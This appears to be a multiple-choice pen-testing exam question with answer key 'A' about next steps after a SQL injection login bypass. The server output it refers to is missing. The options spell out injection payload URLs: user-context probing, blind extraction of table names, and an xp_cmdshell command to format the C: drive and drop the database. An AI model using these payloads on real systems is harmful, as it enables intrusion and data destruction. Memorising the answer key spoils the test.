You are conducting a pen-test against a company’s website using SQL injection techniques. You
enter “anything or 1=1-“ in the username field of an authentication form. This is the output returned
from the server.
What is the next step you should do?
A.
Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; --
D.
Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
A